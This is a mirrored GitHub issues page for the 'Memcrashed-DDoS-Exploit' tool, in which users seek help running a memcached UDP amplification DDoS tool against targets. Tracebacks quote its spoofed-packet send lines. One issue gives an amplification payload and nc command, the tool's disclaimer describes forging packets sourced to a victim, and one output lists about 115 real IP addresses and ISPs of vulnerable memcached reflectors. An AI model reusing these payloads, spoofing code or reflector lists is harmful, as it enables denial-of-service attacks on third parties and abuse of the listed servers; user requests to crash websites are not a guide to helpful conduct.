Giter Club home page Giter Club logo

memcrashed-ddos-exploit's People

Contributors

649 avatar delirious-lettuce avatar dependabot[bot] avatar khast3x avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

memcrashed-ddos-exploit's Issues

How to?

On what Plattform? Windows ore Linux??
When Downloaded what Commands to Run?
I tryed Linux with this Commands:
git clone https://github.com/649/Memcrashed-DDoS-Exploit/
cd Desktop
cd Memcrashed-DDoS-Exploit
echo MyApiKey >api.txt
./Memcrashed.py

and then it says Access Denied then i tryed
Chmod +x Memcrashed.py
then i tryed again ./Memcrashed.py but then gives me some Errors
"@contextmanager: command not found" line 9
"syntaxt error near unexpected token (')" line10 "def suppress_stout():'" line10

If anyone could help me

Issue running

Python 3 is installed
shodan installed and getting the errors below

python3 Memcrashed.py
Traceback (most recent call last):
File "Memcrashed.py", line 2, in
import sys, os, time, shodan
ModuleNotFoundError: No module named 'shodan'

However i have just queried shodan via CLI with no issues

IPv6 Error

*] Use Shodan API to search for affected Memcached servers? <Y/n>: y
[] Checking Shodan.io API Key: key
[✓] API Key Authentication: SUCCESS [
] Number of bots: 32961

[] Save results for later usage? <Y/n>: y [~] File written: ./bots.txt
[
] Would you like to use locally stored Shodan data? <Y/n>: y
[▸] Enter target IP address: IP. [▸] Enter target port number (Default 80): 80
[▸] Enter preferred power (Default 1): 1
[+] Enter payload contained inside packet:
[] Would you like to display all the bots from Shodan? <Y/n>: n
[
] Would you like to display all the bots stored locally? <Y/n>: n
[*] Ready to engage target IP? <Y/n>: y
[+] Sending 1 forged UDP packet to: 103.21.148.134 .[+] Sending 1 forged UDP packet to: 23.225.239.38
.[+] Sending 1 forged UDP packet to: 209.141.39.89 .[+] Sending 1 forged UDP packet to: 119.29.254.55
.[+] Sending 1 forged UDP packet to: 118.244.234.81.[+] Sending 1 forged UDP packet to: 193.109.144..........

Error
+] Sending 1 forged UDP packet to: 199.66.200.177.[+] Sending 1 forged UDP packet to: 116.228.231.107 .[+] Sending 1 forged UDP packet to: 2a02:c200:1:10:2:6:4103:1
Traceback (most recent call last): File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 238, in h2i inet_aton(x) OSError: illegal IP address string passed to inet_aton
During handling of the above exception, another exception occurred:
Traceback (most recent call last): File "Memcrashed.py", line 135, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 240, in call i.init(*args, **kargs)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
es/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 259, in any2i
return self.h2i(pkt,x) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 240, in h2i x = Net(x)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 90, in init self.parsed,self.netmask = self._parse_net(net)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 83, in _parse_net tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno -9] Address family for hostname not supported

Please help.

Bad key "lines.markerfacecolor" on line 11 in and 12

I just dunno how to fix this (
root@root:~/Memcrashed-DDos-Exploit# python3 Memcrashed.py

Bad key "lines.markerfacecolor" on line 11 in
/usr/share/matplotlib/mpl-data/stylelib/classic.mplstyle.
You probably need to get an updated matplotlibrc file from
http://github.com/matplotlib/matplotlib/blob/master/matplotlibrc.template
or from the matplotlib source distribution

Bad key "lines.markeredgecolor" on line 12 in
/usr/share/matplotlib/mpl-data/stylelib/classic.mplstyle.
You probably need to get an updated matplotlibrc file from
http://github.com/matplotlib/matplotlib/blob/master/matplotlibrc.template
or from the matplotlib source distribution

API

Created shodan account , did everything , when i put the api doesnt work.

Any fix?

nothing happens

im a newbie, and i cant get to know if the attack is succesfull. i gave in an ip and port with default payload but the website doesn't seem to be crashed

Can't send

[+] Sending 2 forged synchronized payloads to: 103.254.14.199
Traceback (most recent call last):
File "Memcrashed.py", line 125, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
File "/usr/local/lib/python3.7/site-packages/scapy/sendrecv.py", line 316, in send
socket = socket or conf.L3socket(*args, **kargs)
File "/usr/local/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 234, in init
super(L2bpfListenSocket, self).init(*args, **kwargs)
File "/usr/local/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 57, in init
(self.ins, self.dev_bpf) = get_dev_bpf()
File "/usr/local/lib/python3.7/site-packages/scapy/arch/bpf/core.py", line 115, in get_dev_bpf
raise Scapy_Exception("No /dev/bpf handle is available !")
scapy.error.Scapy_Exception: No /dev/bpf handle is available !
Exception ignored in: <function _L2bpfSocket.del at 0x10fd2b7a0>
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 131, in del
self.close()
File "/usr/local/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 203, in close
if not self.closed and self.ins is not None:
AttributeError: 'L3bpfSocket' object has no attribute 'ins'

pip install shadon ERORR

pip install shadon
Collecting shadon
Could not find a version that satisfies the requirement shadon (from versions: )
No matching distribution found for shadon
?? can you help me ?

Scapy errors

File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 240, in call
i.init(*args, **kargs)
File "/usr/lib/python3.6/site-packages/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 259, in any2i
return self.h2i(pkt,x)
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 240, in h2i
x = Net(x)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 90, in init
self.parsed,self.netmask = self._parse_net(net)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 83, in _parse_net
tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno -2] Name does not resolve

Error Traceback

Traceback (most recent call last):
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 238, in h2i
inet_aton(x)
OSError: illegal IP address string passed to inet_aton

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "Memcrashed.py", line 118, in
send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 240, in call
i.init(*args, **kargs)
File "/usr/lib/python3.6/site-packages/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 259, in any2i
return self.h2i(pkt,x)
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 240, in h2i
x = Net(x)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 90, in init
self.parsed,self.netmask = self._parse_net(net)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 83, in _parse_net
tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno -2] Name does not resolve

Help, what is that?

python setup.py egg_info" failed with error code 1

python3 Memcrashed.py ->Traceback (most recent call last):
File "Memcrashed.py", line 5, in
from scapy.all import *
ModuleNotFoundError: No module named 'scapy' ->pip3 install scapy->ollecting scapy
Downloading scapy-2.3.3.tgz (1.4MB)
100% |████████████████████████████████| 1.4MB 529kB/s
Complete output from command python setup.py egg_info:
Traceback (most recent call last):
File "", line 1, in
File "/tmp/pip-build-6t71hxt_/scapy/setup.py", line 36
os.chmod(fname, 0755)
^
SyntaxError: invalid token

----------------------------------------

Command "python setup.py egg_info" failed with error code 1 in /tmp/pip-build-6t71hxt_/scapy/

Doesn't seems working at all.

As example, I tried to use the attack on my own IP with open port 11211, but it didn't worked at all. I have Shodan Membership and entered API key, running everything with Python 3 and have all the modules installed. What I have to do? Memcrashed doesn't shows any errors, but still doesn't have any effect.

Traceback: line 5, in <module> from scapy.all import *

root@d1amond:# cd Memcrashed-DDoS-Exploit/
root@d1amond:
/Memcrashed-DDoS-Exploit# python3.6 ./Memcrashed.py

Traceback (most recent call last):
 File "./Memcrashed.py", line 5, in <module>
    from scapy.all import *
ModuleNotFoundError: No module named 'scapy.all'

root@d1amond:~/Memcrashed-DDoS-Exploit# pip install scapy

Requirement already satisfied: scapy in /usr/local/lib/python2.7/dist-packages/scapy-2.4.2.dev12-py2.7.egg

ip_array error

I got this error:
Traceback (most recent call last):
File "Memcrashed.py", line 112, in
for x in ip_array:
NameError: name "ip_array" is not defined

no packet sending

no packet sending
and if you wait a little, the Exiting Platform writes. Have a wonderful day.

Can't attack outgoing traffic

I am a Chinese user. When I use the software, I cannot attack traffic. Other functions are normal. What is the problem? --translation software

IP Substitution

Hi my friend! Prompt please. This script will work if the proxy suppresses the IP substitution. When I try to send a packet with the changed IP. he does not reach the addressee. Met with this problem?

ya memed me

python 3.x required
then you say pip install scapy
meanwhile python 2 is better nerd its supposed to be
pip install scapy-python3
jeez

Crash starting

On Kali Linux (all dependencies installed):

python Memcrashed.py

File "Memcrashed.py", line 25
SyntaxError: Non-ASCII character '\xe2' in file Memcrashed.py on line
26, but no encoding declared; see http://python.org/dev/peps/pep-0263/
for details

Solved adding at beginning of file:

-- coding: utf8 --

Memcrashed is still working?

So, tried to DDoSe a target and nothing, so i search a lil more and there are comments that Memcrashed doesn't work anymore, so, what's the truth?

idk

how do i start it

NameError: name 'i' is not defined

Traceback (most recent call last):
File "Memcrashed.py", line 139, in
print('[+] Sending 2 forged synchronized payloads to: %s' % (i))
NameError: name 'i' is not defined

not defined

Traceback (most recent call last):
File "memcrashed.py", line 63, in
query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower()
File "", line 1, in
NameError: name 'y' is not defined

Invalid API / no bots.txt

Hey , on the following moment for some reason I am not able to use my Shodan API key for Memcrashed. I have a bunch of questions. First of all , are you supposed to have upgraded account in order to use Memcrashed or both of them are fine. And when you are entering your API is it ok if it includes spaces ?

Also , It;s kind of strange , in my Memcrashed directory i've created a file called bots.txt , and it includes arround 17000 ip addresses, and it says that bots.txt not found.

Output:

`/Memcrashed-DDoS-Exploit$ ls
1.png 2.png 3.png 4.png api.txt bots.txt Dockerfile Memcrashed.py README.md requirements.txt
:
/Memcrashed-DDoS-Exploit$ sudo docker run -it memcrashed
[sudo] password for :

███╗ ███╗███████╗███╗ ███╗ ██████╗██████╗ █████╗ ███████╗██╗ ██╗███████╗██████╗
████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██║██╔════╝██╔══██╗
██╔████╔██║█████╗ ██╔████╔██║██║ ██████╔╝███████║███████╗███████║█████╗ ██║ ██║
██║╚██╔╝██║██╔══╝ ██║╚██╔╝██║██║ ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝ ██║ ██║
██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║ ██║██║ ██║███████║██║ ██║███████╗██████╔╝
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚═════╝

                                    Author: @037
                                    Version: 4.0

####################################### DISCLAIMER ########################################
| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable |
| memcached servers. It then allows you to use the same servers to launch widespread |
| distributed denial of service attacks by forging UDP packets sourced to your victim. |
| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. |
| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
###########################################################################################

[*] Please enter a valid Shodan.io API Key:
[~] File written: ./api.txt

[*] Use Shodan API to search for affected Memcached servers? <Y/n>: y

[] Checking Shodan.io API Key:
[✘] Error: Please upgrade your API plan to use filters or paging.
[] Would you like to change API Key? <Y/n>: y
[
] Please enter valid Shodan.io API Key:
[
] File written: ./api.txt
[~] Restarting Platform! Please wait.

[] Use Shodan API to search for affected Memcached servers? <Y/n>: n
[
] Would you like to use locally stored Shodan data? <Y/n>: y

[✘] Error: No bots stored locally, bots.txt file not found!

`

ip address spoofing failed

Hello, I am doing a test to simulate memcache ddos.
I installed memcache 1.5.4 in kali os through apt command, and the memcache is listening 127.0.0.1:11211
First, I set a key set a 0 0 abcdef, and get it by get a through telnet. It works as plan.
then I use python -c "print '\0\0\0\0\0\x01\0\0get a a a a a\r\n'" | nc -nvvu 127.0.0.1 11211 > /dev/null to simulate amplification attack, and use wireshark to capture all interfaces without setting any filter. I can see what is going on. And it works as plan too. I can see the large package returned by port 11211
But when I change the source ip address by send(IP(src='a public ip address') / UDP(dport=11211) / Raw(load='\x00\x00\x00\x00\x00\x01\x00\x00get a a a a a\r\n'), count=1)
I can not see any response packages from port 11211, but just one package that I sent. It seems like memcache didn't response to the UDP get command.
Then I test:
send(IP() / UDP(dport=11211) / Raw(load='\x00\x00\x00\x00\x00\x01\x00\x00get a a a a a\r\n'), count=1)
I still can not see any response packages from port 11211.
Can you help me ? Thanks very much!

Request rate limit reached

Error: Request rate limit reached (1 request/ second). Please wait a second before trying again and slow down your API calls.

Error running the exploit

capture
I've installed all the required modules for python and still getting these errors. Can someone help me out with this because I am relatively new to python.

ERROR TRACEBACK (MOST RECENT CALL LAST)

Traceback (most recent call last):
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\fields.py", line 238, in h2i
inet_aton(x)
OSError: illegal IP address string passed to inet_aton

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "C:\Users\msfde\Desktop\Memcrashed-DDoS-Exploit-master\Memcrashed.py", line 121, in
with suppress_stdout():
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\base_classes.py", line 240, in call
i.init(*args, **kargs)
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\fields.py", line 259, in any2i
return self.h2i(pkt,x)
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\fields.py", line 240, in h2i
x = Net(x)
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\base_classes.py", line 90, in init
self.parsed,self.netmask = self._parse_net(net)
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\base_classes.py", line 83, in _parse_net
tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno 11001] getaddrinfo failed

error

Traceback (most recent call last):
File "Memcrashed.py", line 125, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
File "/home/admin/.local/lib/python3.6/site-packages/scapy/sendrecv.py", line 289, in send
socket = conf.L3socket(*args, **kargs)
File "/home/admin/.local/lib/python3.6/site-packages/scapy/arch/linux.py", line 407, in init
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
File "/usr/lib/python3.6/socket.py", line 144, in init
_socket.socket.init(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol

Error

Python 3.6
scapy-2.4.0rc5-py3.6
image

Error

Traceback (most recent call last):
  File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 238, in h2i
    inet_aton(x)
OSError: illegal IP address string passed to inet_aton

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "Memcrashed.py", line 122, in <module>
    send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=p                                                                                                                                                             ower)
  File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 240, in __                                                                                                                                                             call__
    i.__init__(*args, **kargs)
  File "/usr/lib/python3.6/site-packages/scapy/packet.py", line 134, in __init__
    self.fields[f] = self.get_field(f).any2i(self, v)
  File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 259, in any2i
    return self.h2i(pkt,x)
  File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 240, in h2i
    x = Net(x)
  File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 90, in __i                                                                                                                                                             nit__
    self.parsed,self.netmask = self._parse_net(net)
  File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 83, in _pa                                                                                                                                                             rse_net
    tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno -2] Name does not resolve

only 100 request packet

i can not know this, why only 100 requests ?

[*] Please enter a valid Shodan.io API Key: *********************
[~] File written: ./api.txt

[*] Use Shodan API to search for affected Memcached servers? <Y/n>: y

[] Checking Shodan.io API Key: ******************
[✓] API Key Authentication: SUCCESS
[] Number of bots: 61435

[*] Save results for later usage? <Y/n>: y
[~] File written: ./bots.txt

[*] Would you like to use locally stored Shodan data? <Y/n>: y

[▸] Enter target IP address: *********
[▸] Enter preferred power (Default 1): 1
[▸] Enter payload contained inside packet: 10

[*] Would you like to display all the bots from Shodan? <Y/n>: y

[+] Memcache Server (1) | IP: 185.58.205.218 | OS: None | ISP: MAROSNET Telecommunication Company LLC |
[+] Memcache Server (2) | IP: 114.215.198.32 | OS: None | ISP: Aliyun Computing Co. |
[+] Memcache Server (3) | IP: 79.98.30.159 | OS: None | ISP: UAB Interneto vizija |
[+] Memcache Server (4) | IP: 198.11.234.98 | OS: None | ISP: SoftLayer Technologies |
[+] Memcache Server (5) | IP: 51.254.93.89 | OS: None | ISP: OVH SAS |
[+] Memcache Server (6) | IP: 69.50.212.204 | OS: None | ISP: CrystalTech Web Hosting |
[+] Memcache Server (7) | IP: 43.225.158.248 | OS: None | ISP: hongkong kwaifong information service limited |
[+] Memcache Server (8) | IP: 23.225.113.65 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (9) | IP: 23.244.241.178 | OS: Windows 7 or 8 | ISP: Enzu |
[+] Memcache Server (10) | IP: 61.147.124.51 | OS: None | ISP: China Telecom jiangsu |
[+] Memcache Server (11) | IP: 109.235.252.151 | OS: None | ISP: Dgn Teknoloji A.s. |
[+] Memcache Server (12) | IP: 147.52.110.5 | OS: None | ISP: University of Crete |
[+] Memcache Server (13) | IP: 77.75.124.183 | OS: None | ISP: UK Dedicated Servers Limited |
[+] Memcache Server (14) | IP: 164.58.48.5 | OS: None | ISP: Oklahoma State Regents for Higher Education |
[+] Memcache Server (15) | IP: 54.37.242.70 | OS: None | ISP: OVH SAS |
[+] Memcache Server (16) | IP: 123.30.157.244 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (17) | IP: 42.121.236.117 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (18) | IP: 139.199.184.33 | OS: None | ISP: Tencent cloud computing |
[+] Memcache Server (19) | IP: 216.98.10.213 | OS: None | ISP: Atlantic.Net - New York, NY |
[+] Memcache Server (20) | IP: 185.174.28.89 | OS: None | ISP: Corelux Internet ve Yazilim Hizmetleri Ticaret Lim |
[+] Memcache Server (21) | IP: 47.75.48.225 | OS: None | ISP: Alibaba |
[+] Memcache Server (22) | IP: 123.30.191.42 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (23) | IP: 91.224.140.37 | OS: None | ISP: Innovation IT Solutions LTD |
[+] Memcache Server (24) | IP: 149.56.165.165 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (25) | IP: 119.38.160.30 | OS: None | ISP: FoShan RuiJiang Science and Tech |
[+] Memcache Server (26) | IP: 123.30.139.46 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (27) | IP: 123.31.43.241 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (28) | IP: 119.23.21.215 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (29) | IP: 115.29.160.192 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (30) | IP: 149.202.44.25 | OS: None | ISP: OVH SAS |
[+] Memcache Server (31) | IP: 203.122.25.59 | OS: None | ISP: Citycom Networks Pvt |
[+] Memcache Server (32) | IP: 195.161.62.194 | OS: None | ISP: Avguro Technologies Ltd. Hosting service provider |
[+] Memcache Server (33) | IP: 185.12.124.76 | OS: None | ISP: QWARTA LLC |
[+] Memcache Server (34) | IP: 173.212.245.117 | OS: None | ISP: Contabo GmbH |
[+] Memcache Server (35) | IP: 1.60.17.28 | OS: None | ISP: China Unicom Heilongjiang |
[+] Memcache Server (36) | IP: 103.27.237.107 | OS: None | ISP: Long Van System Solution JSC |
[+] Memcache Server (37) | IP: 203.172.121.141 | OS: None | ISP: CS LoxInfo |
[+] Memcache Server (38) | IP: 134.213.30.27 | OS: None | ISP: Rackspace Ltd. |
[+] Memcache Server (39) | IP: 158.69.36.2 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (40) | IP: 72.14.186.34 | OS: None | ISP: Linode |
[+] Memcache Server (41) | IP: 5.39.57.88 | OS: None | ISP: OVH Hosting Limited |
[+] Memcache Server (42) | IP: 81.169.215.229 | OS: None | ISP: Strato AG |
[+] Memcache Server (43) | IP: 209.236.126.69 | OS: None | ISP: PrivateSystems Networks |
[+] Memcache Server (44) | IP: 192.99.25.230 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (45) | IP: 125.34.67.139 | OS: None | ISP: China Unicom Beijing |
[+] Memcache Server (46) | IP: 103.45.13.162 | OS: None | ISP: Shenzhen Qianhai bird cloud computing Co. |
[+] Memcache Server (47) | IP: 23.244.241.138 | OS: None | ISP: Enzu |
[+] Memcache Server (48) | IP: 62.176.2.210 | OS: None | ISP: Rial Com JSC |
[+] Memcache Server (49) | IP: 66.70.223.64 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (50) | IP: 61.9.48.146 | OS: None | ISP: SKYBroadband SKYCable Corporation |
[+] Memcache Server (51) | IP: 37.56.90.63 | OS: None | ISP: SaudiNet |
[+] Memcache Server (52) | IP: 108.61.246.84 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (53) | IP: 23.225.95.252 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (54) | IP: 207.210.68.42 | OS: None | ISP: Global Net Access, LLC |
[+] Memcache Server (55) | IP: 47.88.104.228 | OS: None | ISP: Alibaba |
[+] Memcache Server (56) | IP: 117.54.238.221 | OS: None | ISP: INDO Internet, PT |
[+] Memcache Server (57) | IP: 23.225.95.36 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (58) | IP: 172.247.51.143 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (59) | IP: 139.196.239.43 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (60) | IP: 173.201.27.39 | OS: None | ISP: GoDaddy.com, LLC |
[+] Memcache Server (61) | IP: 54.248.233.245 | OS: None | ISP: Amazon.com |
[+] Memcache Server (62) | IP: 123.30.128.176 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (63) | IP: 133.242.185.90 | OS: None | ISP: SAKURA Internet |
[+] Memcache Server (64) | IP: 113.120.61.246 | OS: None | ISP: China Telecom Shandong |
[+] Memcache Server (65) | IP: 114.7.34.18 | OS: None | ISP: PT Indosat Tbk. |
[+] Memcache Server (66) | IP: 117.103.206.12 | OS: None | ISP: VTC Multimedia Corporation |
[+] Memcache Server (67) | IP: 213.251.187.75 | OS: None | ISP: OVH SAS |
[+] Memcache Server (68) | IP: 220.164.24.38 | OS: None | ISP: China Telecom Yunnan |
[+] Memcache Server (69) | IP: 123.30.128.187 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (70) | IP: 172.247.51.58 | OS: Windows 7 or 8 | ISP: CloudRadium L.L.C |
[+] Memcache Server (71) | IP: 151.80.151.179 | OS: None | ISP: OVH SAS |
[+] Memcache Server (72) | IP: 153.122.27.24 | OS: None | ISP: Gmo Cloud K.k. |
[+] Memcache Server (73) | IP: 185.140.12.200 | OS: None | ISP: Majd Ngn Ict Development Pjsc |
[+] Memcache Server (74) | IP: 45.77.44.172 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (75) | IP: 112.137.167.32 | OS: None | ISP: TM-VADS DC Hosting |
[+] Memcache Server (76) | IP: 118.139.178.110 | OS: None | ISP: Virtual Private Hosting Service |
[+] Memcache Server (77) | IP: 109.123.155.96 | OS: None | ISP: Tomsk Polytechnic University |
[+] Memcache Server (78) | IP: 128.101.122.229 | OS: None | ISP: University of Minnesota |
[+] Memcache Server (79) | IP: 69.64.83.135 | OS: None | ISP: Codero |
[+] Memcache Server (80) | IP: 198.23.171.155 | OS: None | ISP: ColoCrossing |
[+] Memcache Server (81) | IP: 54.210.138.147 | OS: None | ISP: Amazon.com |
[+] Memcache Server (82) | IP: 95.158.131.144 | OS: None | ISP: Novatel LTD. |
[+] Memcache Server (83) | IP: 222.216.1.66 | OS: None | ISP: China Telecom Guangxi |
[+] Memcache Server (84) | IP: 181.112.145.251 | OS: None | ISP: Corporacion Nacional De Telecomunicaciones - Cnt E |
[+] Memcache Server (85) | IP: 118.31.71.231 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (86) | IP: 176.53.20.46 | OS: None | ISP: Radore Veri Merkezi Hizmetleri A.S. |
[+] Memcache Server (87) | IP: 111.231.110.149 | OS: None | ISP: Tencent cloud computing |
[+] Memcache Server (88) | IP: 89.175.27.177 | OS: None | ISP: MTS PJSC |
[+] Memcache Server (89) | IP: 198.50.191.110 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (90) | IP: 172.247.51.145 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (91) | IP: 211.149.200.233 | OS: None | ISP: Chengdu West Dimension Digital Technology Co. |
[+] Memcache Server (92) | IP: 182.253.226.85 | OS: None | ISP: Biznet Networks |
[+] Memcache Server (93) | IP: 176.31.147.158 | OS: None | ISP: OVH SAS |
[+] Memcache Server (94) | IP: 112.4.90.134 | OS: None | ISP: China Mobile |
[+] Memcache Server (95) | IP: 112.124.125.107 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (96) | IP: 77.81.164.139 | OS: None | ISP: Voxility S.R.L. |
[+] Memcache Server (97) | IP: 69.175.18.42 | OS: None | ISP: SingleHop |
[+] Memcache Server (98) | IP: 45.77.221.32 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (99) | IP: 123.31.19.98 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (100) | IP: 50.97.148.126 | OS: None | ISP: SoftLayer Technologies |
[*] Would you like to display all the bots stored locally? <Y/n>: y

[+] Memcache Server (1) | IP: 185.58.205.218 | OS: None | ISP: MAROSNET Telecommunication Company LLC |
[+] Memcache Server (2) | IP: 114.215.198.32 | OS: None | ISP: Aliyun Computing Co. |
[+] Memcache Server (3) | IP: 79.98.30.159 | OS: None | ISP: UAB Interneto vizija |
[+] Memcache Server (4) | IP: 198.11.234.98 | OS: None | ISP: SoftLayer Technologies |
[+] Memcache Server (5) | IP: 51.254.93.89 | OS: None | ISP: OVH SAS |
[+] Memcache Server (6) | IP: 69.50.212.204 | OS: None | ISP: CrystalTech Web Hosting |
[+] Memcache Server (7) | IP: 43.225.158.248 | OS: None | ISP: hongkong kwaifong information service limited |
[+] Memcache Server (8) | IP: 23.225.113.65 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (9) | IP: 23.244.241.178 | OS: Windows 7 or 8 | ISP: Enzu |
[+] Memcache Server (10) | IP: 61.147.124.51 | OS: None | ISP: China Telecom jiangsu |
[+] Memcache Server (11) | IP: 109.235.252.151 | OS: None | ISP: Dgn Teknoloji A.s. |
[+] Memcache Server (12) | IP: 147.52.110.5 | OS: None | ISP: University of Crete |
[+] Memcache Server (13) | IP: 77.75.124.183 | OS: None | ISP: UK Dedicated Servers Limited |
[+] Memcache Server (14) | IP: 164.58.48.5 | OS: None | ISP: Oklahoma State Regents for Higher Education |
[+] Memcache Server (15) | IP: 54.37.242.70 | OS: None | ISP: OVH SAS |
